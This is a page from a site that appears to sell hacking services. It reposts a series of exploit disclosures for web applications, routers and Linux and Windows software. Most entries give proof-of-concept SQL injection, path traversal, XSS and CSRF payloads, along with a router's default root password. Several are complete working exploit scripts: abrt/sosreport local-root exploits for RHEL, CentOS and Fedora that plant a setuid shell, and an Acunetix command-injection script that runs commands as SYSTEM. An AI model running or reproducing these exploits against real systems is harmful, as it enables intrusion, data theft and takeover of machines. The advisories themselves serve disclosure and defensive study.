Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863222341

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/63257/info

The Daily Deal theme is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

http://www.example.com/wp-content/themes/DailyDeal/monetize/upload/
HireHackking 
source: https://www.securityfocus.com/bid/63259/info

DELL Quest One Password Manager is prone to a security bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and gain access to sensitive areas of the application to perform unauthorized actions; this may aid in launching further attacks. 

ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false
HireHackking 
######################
# Exploit Title : MyCustomers Cms Sql Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.iran-php.com/
# Google Dork : "Powered By IranPHP" & inurl:/index.php?DPT=IP17 & "Powered+by+MyCustomers-1.3.873"
# Date: 2015/11/28
# Version :  1.3
# 
######################
# Vulnerable Paramter DPT=
# Demo:
# http://server/index.php?DPT=IP17%27
#
# Youtube : https://www.youtube.com/watch?v=43DVOq5L2hw
#
# We reported to vendor but Anyone not responsive
# It's not joke
# We do not take responsibility
#
######################
# Discovered by : 
# Mojtaba MobhaM & T3NZOG4N (t3nz0g4n@yahoo.com)
######################
HireHackking 
=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 ===

HumHub - SQL-Injection
------------------------------------------------------------------------

Tested Versions
===============
HumHub 0.11.2 and 0.20.0-beta.2

Issue Overview
==============
Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Technical Risk: high
Likelihood of Exploitation: high
Vendor:  HumHub GmbH & Co. KG
Vendor URL: https://www.humhub.org
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt
Advisory Status: Public
CVE-Number: ----
CVE URL: ---


Impact
======
Enables to read and modify the HumHub Mysql Database.


Issue Description
=================
While conducting an internal software evaluation, LSE Leading
Security Experts GmbH discovered that the humhub social networking
software is subject to an sql-injection attack.


Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to block
access to the humhub software until the vendor
provides a patch.

Proof of Concept
================

Opening the following URL

http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&mode=normal

shows the SQL-error, which is easily exploitable using sqlmap.

./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&mode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2  -p from -a

...

---
Parameter: from (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=-4670 OR 5804=5804#&mode=normal

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal
---



History
=======
2015-10-14  Issue discovered
2015-10-15  Vendor contacted
2015-10-15  Vendor response and hotfix
2015-10-20  Vendor releases fixed versions
2015-11-30  Advisory release

GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc
HireHackking 
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015

# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport:  sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release 
# Red Hat Enterprise Linux Server release 7.1 (Maipo)

import os,sys,glob,time,sys,socket

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"

pid = os.fork()

if pid == 0:
	os.execl("/usr/bin/sleep","sleep","100")

time.sleep(0.5)

print "crashing pid %d" % pid

os.kill(pid,11)

print "waiting for dump directory"

def waitpath(p):
	while 1:
		r = glob.glob(p)
		if len(r) > 0:
			return r
		time.sleep(0.05)	

dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]

print "dump directory: ", dumpdir

os.chdir(dumpdir)

print "waiting for sosreport directory"

sosreport = waitpath("sosreport-*")[0]

print "sosreport: ", sosreport

print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")

print "tmpfiles: ", tmpfiles

print "moving directory"

os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)

os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)

os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")

print "moving tmpfiles"

for x in tmpfiles:
	print "%s -> %s" % (x,x + ".old")
	os.rename(x, x + ".old")
	open(x, "w+").write("/tmp/hax.sh\n")
	os.chmod(x,0666)


os.chdir("/")

sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")


def trigger():
	open("/tmp/hax.sh","w+").write(payload)
	os.chmod("/tmp/hax.sh",0755)
	try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
	except: pass
	time.sleep(0.5)
	try:
		os.stat("/tmp/sh")
	except:
		print "could not create suid"
		sys.exit(-1)
	print "success"
	os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
	sys.exit(-1)

for x in xrange(0,60*10):
	if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
		print "done"
		trigger()
	time.sleep(1)
	sys.stderr.write(".")

print "timed out"
HireHackking 
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a

kodi web interface vulnerable to arbitrary file read.

example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


for passwd

(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)
HireHackking 
#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------

# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release 
# CentOS Linux release 7.1.1503 (Core) 
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


import time,os,datetime,sys,resource,socket


fedora = "Fedora" in open("/etc/redhat-release").read()

# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2

cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")

if fedora:
	cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"


# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end

# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp

elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")

# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)

"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
                org     0x08048000
ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1, 0         ;   e_ident
        times 8 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      1                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx
  ehdrsize      equ     $ - ehdr
  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      5                               ;   p_flags
                dd      0x1000                          ;   p_align
  phdrsize      equ     $ - phdr

_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message         db      '////////tmp/hax.sh',0x0a,0
msglen          equ     $-message
"""



build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]

os.chdir("/tmp")


open("build_ids","w+").write(build_id + "\n")

print build_id


def child():
	timestamp = int(time.time())

	for i in xrange(0,3):
		try:
			t = datetime.datetime.fromtimestamp(timestamp+i)
			d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
			os.mkdir(d)
			os.chmod(d,0777)
			os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
			print "created %s" % d
		except: pass

	os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")

try:
	os.mkfifo("/var/tmp/haxfifo")
	os.chmod("/var/tmp/haxfifo",0666)
except:
	pass

def fifo(a):
	print "reading from fifo.."
	open("/var/tmp/haxfifo").read()
	print "done"

	print "writing to fifo.."
	open("/var/tmp/haxfifo","w+").write(a)
	print "done"

if os.fork() == 0: child()

print "first cpio..."
fifo(cpio1)

os.wait()
time.sleep(1)

if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)

os.wait()
time.sleep(1)

if fedora:
	sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
	sym = "/var/spool/abrt/abrt-hax-coredump"

try:
	os.lstat(sym)
except:
	print "could not create symlink"
	sys.exit(-1)

print "%s created" % sym

open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)

if os.fork() == 0:
	resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
	print "executing crashing process.."
	os.execle("/tmp/abrt-hax","",{})

os.wait()
time.sleep(1)	

if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
	print "could not modify /proc/sys/kernel/modprobe"
	sys.exit(-1)

open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)

try:
	socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
	pass

time.sleep(0.5)

try:
	os.stat("/tmp/sh")
except:
	print "could not create suid"
	sys.exit(-1)

print "success"

os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
HireHackking 
# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation
# Author: Dolev Farhi
# Contact: dolev at flaresec.com
# Vulnerable version: 2.0.151021
# Fixed version: 2.2
# Link: ntop.org
# Date 27.11.2015
# CVE-2015-8368

# Product Details:
ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.

# Vulnerability Details:
in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters.

# Vulnerability Proof of concept
1. Login with an unprivileged account
2. Change the account password and intercept the request, modify  the username= and Cookie user= and change to the admin account
Example:
GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX
3. Login with the admin account and the password you defined in step #3.

Voila! you're an administrator.
HireHackking 
# Exploit Title: IP.Board Persistent XSS Vulnerability
# Date: 29/10/2015
# Software Link: https://www.invisionpower.com/buy
# Software version : 4.1.4.x
# Exploit Author: Mehdi Alouache
# Contact: mehdi.alouache@etu.univ-lehavre.fr
# Category: webapps

1. Description

Any registered user can execute remote javascript code by sending a 
private message to another user. The malicious JS code has to
be written in the title of the message, and the receiver must have 
enabled the notifications when a new message is delivered.
Note that the code will be directly executed as soon as the notification 
appear. (The receiver doesn't even need to check his
inbox).

2. Proof of Concept

Register on the forum (IP.Board) of a website as a regular user, and 
send a message to any user having the message notifications
enabled. In the title field (and only here), a simple 
<script>alert(1)</script> will show a dialog box to the victim.

3. Solution:

Patch the vulnerability with the (incoming) associated patch.

-- 
ALOUACHE Mehdi
Departement informatique
Groupe A

mehdi.alouache@hotmail.fr
mehdi.alouache@etu.univ-lehavre.fr
HireHackking 
##Full Disclosure:

#Exploit Title      : Belkin N150 Wireless Home Router Multiple
Vulnerabilities
#Exploit Author     : Rahul Pratap Singh
#Date               : 30/Nov/2015
#Home Page Link     : http://www.belkin.com
#Blog Url           : 0x62626262.wordpress.com
#Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
#Status             : Not Patched

→ Vulnerability/BUG Report :

1)

• Vulnerability Title  :  HTML/Script Injection
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Proof of Concept:

"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is
vulnerable.

https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:

Send the following post request using Burpsuite,etc

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)

• Vulnerability Title  :  Session Hijacking
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Proof of Concept:

Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

sessionid is allocated using hex encoding and of fixed length i.e 8 .
Therefore, it is very easy to bruteforce it in feasible amount for time as
this session id ranges from 00000000 to ffffffff

→ Steps to Reproduce:

Send the following request using Burpsuite and Bruteforce the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101
Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)

• Vulnerability Title  :  Telnet Enabled with Default Pass
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Vulnerability Details:

Telnet protocol can be used by an attacker to gain remote access to the
router with root privileges.

→ Proof of Concept:

https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:

1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) Default user and pass is root:root

4)

• Vulnerability Title  :  Cross Site Request Forgery
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Proof of Concept:

Request doesn't contain any CSRF-token. Therefore, requests can be forged.
It can be verified with any request.

Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again:  25 Nov 2015

No Response.

Full Disclosure: 30 Nov 2015

Ref:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt


Vendor:
====================
www.zenphoto.org


Product:
===================
Zenphoto 1.4.10


Vulnerability Type:
========================
Local File Inclusion


CVE Reference:
==============
N/A


Vulnerability Details:
======================
Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion
that allows attackers
to read arbitrary server files outside of the current web directory by
injecting "../" directory traversal
characters, which can lead to sensitive information disclosure, code
execution or DOS on the victims web server.


Local File Inclusion Codes:
==========================
http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo



Disclosure Timeline:
=====================
Vendor Notification: November 10, 2015
December 1, 2015  : Public Disclosure


Exploitation Technique:
=======================
Local


Severity Level:
================
High


Description:
=====================================================
Request Method(s):              [+] GET


Vulnerable Product:             [+] Zenphoto 1.4.10


Vulnerable Parameter(s):        [+] extension



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/63773/info

Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable. 

http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
http://www.example.com/test/admin/index.php
HireHackking 
source: https://www.securityfocus.com/bid/63795/info

TomatoCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected. 

http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
HireHackking 
source: https://www.securityfocus.com/bid/63800/info

The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected. 

<form id=.upload-form. 
action=.http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos. 
method=.post.>
<table class=.form-table.>
<tbody>
<tr valign=.top.>
<th scope=.row.>Title</th>
<td><input id=.bw_title. type=.text. maxlength=.75. name=.bw_title. 
size=.70. value=.http://www.example2.com/code/evil.js. />
</tr>
<tr valign=.top .>
<th scope=.row.>URL</th>
<td><input id=.bw_url. type=.text. maxlength=.75. name=.bw_url. 
size=.70. value=.http://www.example2.com/code/evil.js. />
</td>
</tr>
</tbody>
</table>
</form>
HireHackking 
source: https://www.securityfocus.com/bid/63805/info

SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities.

Attackers can exploit these issues to execute arbitrary commands in the context of the affected system.

SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected. 

curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1
HireHackking 
source: https://www.securityfocus.com/bid/63814/info

nginx is prone to a remote security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.

nginx 0.8.41 through 1.5.6 are vulnerable. 

The following example data is available:

/file \0.php
HireHackking 
'''
========================================================================
Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)

CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix  WVS 10, it allow
a local user (even guest) to gain same privilege as System user.

With default Acunetix installation, a service called "AcuWVSSchedulerv10"
will be installed, this service run as local system user.

AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
it expose some API to interact via a web server usually localhost:8183.

API:

/listScan
/addScan <== vulnerable one
/deleteScan
etc...

When a user schedule a scan API "addScan" will be called as following

-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{
    "scanType": "scan",
    "targetList": "",
    "target": ["http://.target.it"],
    "recurse": "-1",
    "date": "12/2/2015",
    "dayOfWeek": "1",
    "dayOfMonth": "1",
    "time": "12:21",
    "deleteAfterCompletion": "False",
    "params": {
        "profile": "Default",
        "loginSeq": "<none>",
        "settings": "Default",
        "scanningmode": "heuristic",
        "excludedhours": "<none>",
        "savetodatabase": "True",
        "savelogs": "False",
        "generatereport": "False",
        "reportformat": "PDF",
        "reporttemplate": "WVSAffectedItemsReport.rep",
        "emailaddress": ""
    }
}
------------------------------------------------------------------------------

The first thing i noticed was the reporttemplate, this was used to create report
when scanning ends, so it means an external file wich we can control will be then 
used by System! this would be interesting enough but i never look deep into.
Instead i noticed something even worst, filename was used as argument to wvs.exe
called with system privilege!

By looking at how Acunetix handled reporttemplate argument i figured out that was 
possibile to inject custom arguments within reporttemplate, now this is where 
Acunetix help us :D in fact wvs was provided with an interesting argument it was 
/Run as reference says:

https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/

Run a command line command during the crawl.
Syntax: /Run [command]

Example: /Run curl http://example.com/dir1/

Wow that's really nice, so in order to execute a command we must insert a fake 
Crawl followed by a Run command so reporttemplate become:

"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"

it worked cmd runned as System!
==================================================================================

Now let's pwn this!

escalation.py
'''

import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime


COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
    }
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\"" 
ACUDATA = {"scanType":"scan",
           "targetList":"",
           "target":["http://"+"A"*2048],
           "recurse":"-1",
           "date":strftime("%m/%d/%Y", gmtime()),
           "dayOfWeek":"1",
           "dayOfMonth":"1",
           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
           "deleteAfterCompletion":"False",
           "params":{"profile":"Default",
                     "loginSeq":"<none>",
                     "settings":"Default",
                     "scanningmode":"heuristic",
                     "excludedhours":"<none>",
                     "savetodatabase":"True",
                     "savelogs":"False",
                     "generatereport":"False",
                     "reportformat":"PDF",
                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                     "emailaddress":""}
           }

def sendExploit():
    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)

print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"

'''
============================================================================

I hope this write-up was funny enough anyway i really would like to thank
Acunetix product manager N.S. for the really fast answer and bug mitigation, 
right now a patch exists so hurry up download it now.
